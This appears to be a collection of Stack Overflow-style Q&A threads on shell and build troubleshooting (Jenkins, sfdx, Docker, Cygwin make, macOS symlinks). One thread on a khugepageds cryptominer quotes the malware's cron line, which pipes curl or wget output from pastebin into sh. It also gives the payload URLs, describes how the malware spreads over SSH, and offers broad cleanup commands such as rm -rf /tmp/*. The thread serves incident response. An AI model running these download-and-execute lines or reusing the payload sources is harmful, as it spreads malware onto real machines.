I am running a make script (via the Execute Shell option) inside a Jenkins job.
The make script contains an rm -rf <directory name> shell command.
This command fails with an error saying the directory is not empty. Since the script uses rm -rf, it should work even if the directory is not empty.
Not sure what is wrong here.
Any help would be much appreciated.
If your Jenkins job is executed on a Linux machine, this could be:
a permission issue.
a race condition issue: another process may be writing into the directory while rm -rf runs (which is why deleting the files first is a good idea; your rm -Rf then only has empty folders left to delete).
On Windows, check the full error message: a file in the directory may still be held open by another process, preventing the OS from deleting it.
You can first empty the directory and then delete it.
Try running the following commands:
rm mydir/* mydir/.*
rmdir mydir
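Note that rm mydir/.* will complain about the . and .. entries (harmless), and plain rm won't descend into subdirectories. A slightly more robust sketch, assuming GNU find and a possible race with another writer:

# Delete files first, then the (now mostly empty) tree; retry once in
# case another process recreates something mid-delete.
find mydir -type f -delete
rm -rf mydir || { sleep 1; rm -rf mydir; }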
I'm trying to get a Jenkins job to run sfdx force:data:soql:query commands in order to migrate configuration data sets between our production org and our sandboxes after a refresh. Certain configurations do not persist through a refresh, so we need a way to move that data.
Running the queries from the command line on the Jenkins server works as expected; however, when the job runs it fails with the following error:
'C:\Program' is not recognized as an internal or external command, operable program or batch file.
Build step 'Execute shell' marked build as failure
The job does three things:
Authorizes to the DevHub, lists out the connected orgs, and then performs a SOQL query to just print some data - 16 lines to be exact. Here are the commands in the shell script of the job:
sfdx force:auth:jwt:grant -i ${CONNECTED_APP_CONSUMER_KEY} -u ${DEV_HUB} -f ${JENKINS_HOME}/certs/prod/server.key -r [...] -a DevHub
sfdx force:org:list
sfdx force:data:soql:query -u ${DEV_HUB} -q "SELECT Id, Name FROM [...tablename...]" -r human
I am completely stumped on why this is happening. Again, running the SOQL command directly on the server through PowerShell or Command Line works as expected. I would appreciate any help with this.
This one stumped me for a long time but we finally got it figured out.
If you are seeing this error, make sure to check your machine's environment variables. I saw a TON of other answers pointing to this as the issue (the SFDX install path had spaces in it, as in C:\Program Files\SFDX\bin), but they only showed some weird command-line FOR loop that made no sense whatsoever.
What we did was to completely uninstall all of SFDX, making sure none of it was left on the machine, and reinstall into a folder we made where there were no spaces in the path name.
Once we did that, our job worked like it was supposed to. I hope this helps others who run into this same issue.
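Before reinstalling, it can help to confirm which sfdx binary the Jenkins shell actually resolves, since the job's PATH often differs from an interactive PowerShell session. A minimal sketch for the Execute shell step:

# Print what this shell will actually run, and the PATH it searched:
command -v sfdx
echo "$PATH"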
I made the mistake of installing Docker via Snap... Once I realised that snap didn't have permission to run in my working directory (on a different partition), I removed it. Now I can't use Docker after installing it via apt-get.
Please help.
I've done sudo snap remove docker, but when I run sudo apt install docker and then run docker, I get bash: /snap/bin/docker: No such file or directory
The command you are looking for is:
sudo apt install docker.io
i.e. it's docker.io, not just docker.
On Ubuntu, the package docker is described as a "System tray for KDE3/GNOME2 applications", which is probably not what you want!
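A minimal sketch of the full sequence, assuming Ubuntu with apt:

sudo apt remove docker       # drop the unrelated system-tray package if it got installed
sudo apt install docker.io   # the actual Docker engine package on Ubuntu
command -v docker            # should print /usr/bin/docker
docker --version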
I had the same problem. This worked for me:
sudo snap remove docker
sudo reboot
The point is to restart the instance or the terminal.
I hope this method helps.
I did the same and just restarting the instance fixed it.
The problem is simply that your bash shell caches the locations of known executables, in order to avoid having to scan through your executables search path (that is, the directories listed in $PATH) every time you type a command. Because you have removed the executable from one directory (/snap/bin) and added it to another directory (/usr/bin), this cache is now out of date. This means that it will look in the wrong location if you try to invoke the executable simply by typing docker rather than its full path.
It is possible to fix it simply by starting a new bash shell, for example open a new terminal window and type the command in there.
Alternatively if you wish to refresh the cache in the terminal session that you are already using, type:
hash -r
It is not necessary to restart your computer (although this would also work).
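A minimal sketch of the symptom and both fixes (bash-specific):

type docker     # may still report the stale, hashed /snap/bin/docker path
hash -r         # forget all remembered command locations
hash -d docker  # or forget just this one entry
type docker     # re-resolved via $PATH, e.g. /usr/bin/docker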
So the picture above shows a process, khugepageds, that at times uses 98 to 100% of the CPU.
I tried to find out how Jenkins uses this process, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, of course the usage goes down, but once Jenkins restarts it's back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
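To find the PID to substitute, something like this works (pgrep assumed available):

pgrep -a khugepageds   # prints the PID and command line of the running miner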
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron process on the system; it will repeatedly try to gain access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, then restart the VM.
The vulnerability drops unwanted executables in the /tmp folder and tries to access the VM via SSH.
It also adds a cron process on your system; be sure to remove that as well.
Also check the ~/.ssh folder's known_hosts and authorized_keys files for any suspicious SSH public keys. The attacker can add their own SSH keys to keep access to your system.
Hope this helps.
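A short inspection sketch covering the places mentioned above (the jenkins user and Debian-style paths are assumptions; adjust for your setup):

grep -i pastebin /var/log/syslog        # look for the curl|sh cron line
crontab -l -u jenkins                   # list cron entries for the jenkins user
ls -la /tmp                             # look for dropped executables such as kerberods
sudo cat ~jenkins/.ssh/authorized_keys  # remove any keys you don't recognize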
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in your frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojans/viruses/botnet agents, downloads and spawns the binary as /tmp/kerberods, and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (size 3395072, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does. It looks like a botnet controller.
It seems like the vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for a line like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you see that, try stopping Jenkins, clearing the /tmp dir, and killing all PIDs started by the jenkins user.
If the CPU usage then goes down, try updating to the latest LTS version of Jenkins. Then, after starting Jenkins, update all of its plugins.
A solution that works (because the cron file otherwise just gets recreated) is to empty the jenkins user's cron file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
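A sketch of what that looks like (the Debian-style cron spool path is an assumption):

sudo truncate -s 0 /var/spool/cron/crontabs/jenkins    # empty the cron file
sudo chown root:root /var/spool/cron/crontabs/jenkins  # take ownership away from jenkins
sudo chattr +i /var/spool/cron/crontabs/jenkins        # immutable: nothing can rewrite it until chattr -i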
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since everywhere I read about this error the suggested solution was to increase memory.
The problem was solved with HeffZilla's solution.
I was trying to set up a bash command in Terminal on a Mac.
The scripts run correctly when I execute them directly.
I set up symlinks in /usr/local/bin/ to the current location of the scripts. When I try to run them via the symlinks, it doesn't work. I don't believe the issue is $PATH, because pip, git, and ipython all live in this location, and when I edit the $PATH setting to remove it, those commands fail too.
Suggestions?
ls -l /usr/local/bin/foo and see where your symlink is actually pointing. Betcha it's broken.
If not, try running /usr/local/bin/foo. If that works, it was your PATH that's wrong, despite what you said in the OP.
The only other thing that would cause this behavior is if the script is reading $0 (its own name as executed). With a symlink, that will have a different value.
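If it is the $0 case, a tiny sketch shows the difference (note readlink -f is GNU; older macOS needs greadlink from coreutils or a manual resolution loop):

#!/bin/sh
# Prints how the script was invoked vs. where it actually lives.
echo "invoked as: $0"
echo "resolved:   $(readlink -f "$0")"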
I found my own answer... The symlinks were created by an automated script that was grabbing my pwd. I was also using virtualenv, so to get it to work I had to activate the virtualenv and be inside the folder containing the script that created the symlinks.
I install my commands in $HOME/bin instead of /usr/local/bin, but it does not matter much. As hinted in the comments, one question is whether the symlinks are set correctly.
Check which command the shell thinks you should execute: which command
Check that the link in /usr/local/bin points to the correct file (and has execute permission, etc):
ls -l /usr/local/bin/command
ls -lL /usr/local/bin/command
Check that the interpreter path in the shebang is correct:
file /usr/local/bin/command
Check that /usr/local/bin is actually on your PATH: echo $PATH
If none of that turns up a problem, show us the results of the commands above.
While trying to install a build server I've run into a funny problem where all cygwin commands can be run from a DOS box but sometimes do not work when called from make. What's even more weird is some make targets, like 'clean', work and others, like 'all', do not.
Here's a representative makefile extract. The quoting has hosed the formatting but tabs are where they should be, trust me:
.PHONY: all
all: update_autoconstants
/usr/bin/rm -f $(OBJ_DIR)/myfile1.txt
rm -f $(OBJ_DIR)/myfile2.txt
.PHONY: clean
clean:
rm -f $(OBJ_DIR)/*.*
Notice that in 'all' one rm call has a full path and one has no path. Also notice that clean's rm call has no path.
To this, the response to a 'make -C makefile all' is:
/usr/bin/rm -f ../../obj/myfile1.txt
rm -f ../../obj/myfile2.txt
make: rm: Command not found
make: *** [all] Error 127
i.e. the full path works, the no-path one does not. What then starts my head spinning is that the 'clean' target with no path works fine. It's not just Cygwin commands: make can't find the compiler either. It seems pretty clear that somewhere the path has been hosed, although the environment variable PATH is set; but only in make - it works fine from a DOS prompt.
C:\>cygpath --unix c:\programme\cygwin\bin\rm
/usr/bin/rm
The machine is running Windows Server 2003 German language in a virtual machine on VMware ESX; the Cygwin install was done yesterday, into c:\programme\cygwin\, and everything else is a clean vanilla Windows installation.
Any ideas? Thanks in advance.
Not really so much of a solution as a workaround - we made all the makefiles use absolute paths to the exe files they need which is in any case a bit nicer than searching a path and taking what you find.
To perhaps save someone some Googling: commands in Cygwin's bin directory can best be called like this:
CYGWIN_EXE_PATH = /usr/bin
RM = $(CYGWIN_EXE_PATH)/rm.exe
.PHONY: clean
clean:
$(RM) -f $(OBJ_DIR)/*.*
And similarly files in the program files directory like this:
COMPILER_DIR = "$(PROGRAMFILES)/TASKING/c563 v3.6r1"
Hope that helps.
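An alternative sketch is to put Cygwin's bin directory on PATH for the make invocation itself, so unqualified names resolve again (the path matches the install location from the question):

# Run make with Cygwin's bin prepended to PATH (from a Cygwin bash shell):
PATH=/cygdrive/c/programme/cygwin/bin:$PATH make all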
I've had the exact same thing: rm not being found by make from within a makefile.
My workaround was to run the makefile from within bash; previously I was just running make from a Windows cmd box. This cured the problem for me, but created new issues: some files created during the make ended up with very odd permissions.
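For reference, a sketch of that invocation (the project path is hypothetical; the Cygwin path matches the question's install location):

# From cmd, start a Cygwin login shell and run make inside it:
c:\programme\cygwin\bin\bash.exe --login -c "cd /cygdrive/c/projects/myproj && make all"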